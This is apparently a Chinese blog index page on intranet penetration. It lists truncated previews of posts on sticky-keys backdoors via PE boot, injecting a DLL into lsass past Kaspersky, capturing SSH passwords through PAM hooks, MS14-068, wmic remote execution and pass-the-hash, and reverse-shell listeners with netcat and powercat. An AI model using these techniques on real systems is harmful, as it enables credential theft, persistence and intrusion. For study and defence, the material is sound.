内网渗透
2ed
这个作者很懒,什么都没留下…
展开
-
近源(或类似进源)条件下进PE系统制作系统后门
思路:这个灵感源于一次测试,在非常规环境下,当我们可以接触到目标的物理磁盘,或者可以直接接触到目标物理主机时候。可以通过插入或者映射媒体介质,然后重新引导系统进入媒体介质。此后可以读取到主机的磁盘,以此来做手脚。人话:当我们能接近目标时候,给他插上一个PE u盘,然后重启进入pe,此后便拥有了读取磁盘的权限,然后事情就简单了,在PE里面直接制作shift后门。这个操作其实很多系统运维的老哥也会,不过他们是进pe备份磁盘。利用场景:近源环境忘记自己虚拟机密码 QAQ某些pc厂商有那种能原创 2020-10-20 17:12:41 · 796 阅读 · 0 评论 -
绕过卡巴斯基通过RPC控制lsass注入DLL
参考国外的XPN以及3gstudent大佬的文章:https://blog.csdn.net/xiangshen1990/article/details/104872566https://gist.github.com/xpn/93f2b75bf086baf2c388b2ddd50fb5d0原理:正常的ssp扩展(dll)可以加载到lsass进程中去,比如kerberos验证都是通...原创 2020-04-16 10:38:02 · 2865 阅读 · 2 评论 -
linux下监控并实现记录ssh登录密码
测试环境:Linux 2.6.32-754.25.1.el6.x86_64CentOS release 6.10 (Final)首先安装systemtap这个包原理主要是对PAM模块pam_unix.so库文件的函数调用进行捕获,因为用户登录认证需要使用pam_unix.so库文件。yum --releasever=6.4 updateyum install -y ...原创 2019-12-27 17:07:20 · 2724 阅读 · 1 评论 -
内网主机发现扫描
一般获取一台内网机器权限后,要确定内网都有哪些网段,确定了网段后,在进行针对性的扫描Windows可用ipconfig /all 查看ip信息route print 查看路由表netstat -ano 查看连接信息,可能会有其他网段的连接信息net view 查看已经连接的共享,获取到主机名,ping通从而得到ipnet session 查看连接的主机要是能控制到...原创 2019-12-09 15:34:17 · 3886 阅读 · 0 评论 -
NTLM认证原理及其过程
windows认证协议主要有以下两种:基于ntlm的认证方式,主要用在早期的windows工作组环境中,认证的过程也相对比较简单、 另一种是基于Kerberos的认证方式,主要用在域环境中NTLM认证正在上传…重新上传取消以下步骤刻画了 NTLM 非交互式认证过程, 第一步中提供了用户的 NTLM 认证信息,该步是用户交互式认证(Logon)过程的一部分。(...原创 2019-11-19 17:55:32 · 8308 阅读 · 2 评论 -
MS14-068漏洞复现
背景微软今天(2014-11-18)发布了一个紧急补丁,修复了一个影响全部版本Windows服务器的严重漏洞。今天发布的MS14-068漏洞补丁用于解决Microsoft WindowsKerberosKDC漏洞(CVE-2014-6324),该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。也就是说,你在一台普通域用户的机器上利用这个漏洞,那么这个域用户就变...原创 2019-11-18 15:00:26 · 1376 阅读 · 0 评论 -
windows远程执行cmd命令的各方式
1.WMI执行命令方式,无回显:wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>d:\result.txt"2.使用Hash直接登录Windows(HASH传递)抓取windows hash值,得到administrator的...原创 2019-11-14 17:36:13 · 8749 阅读 · 0 评论 -
windows内网渗透中的cmd命令
0x01 基础命令使用:演示环境: 1 2 win2008R2cn ip: 192.168.3.23 假设为入侵者机器 win2012R2cn ip: 192.168.3.122 假设为目标机器 1 2 3 4 5 6 ...转载 2019-11-07 11:38:59 · 3008 阅读 · 0 评论 -
Windows中IPC$服务及利用
IPC$(Internet Process Connection)共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。在WindowsXP windows7等系统中,隐藏着一种据说是可以“致命”的漏洞,它让很多人一听到就谈“虎”色变。在“我的电脑”上右击“管理”,依次...原创 2019-11-13 18:03:24 · 4387 阅读 · 1 评论 -
Linux下内网渗透常见命令
操作系统版本cat /etc/issuecat /etc/*-releasecat /etc/lsb-releasecat /etc/redhat/release操作系统的内核版本cat /proc/versionuname -auname -mrsrpm -q kerneldmesg |grep Linuxls /boot |grep vmlinuz用...原创 2019-08-20 23:50:59 · 1900 阅读 · 0 评论 -
Windows下反弹shell的方法
1.powercat反弹shellpowercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat首先攻击者开启监听nc -lvp 6666或者使用powercat监听powercat -l -p 6666接着在目标机上反弹cmd shell:...原创 2019-07-16 22:51:06 · 13736 阅读 · 0 评论 -
Windwows内网渗透中常见命令
ipconfig /all ------ 查询本机IP段,所在域等 net user ------ 本机用户列表 net localhroup administrators ------ 本机管理员[通常含有域用户] net user /domain ------ ...原创 2019-07-16 10:07:03 · 955 阅读 · 0 评论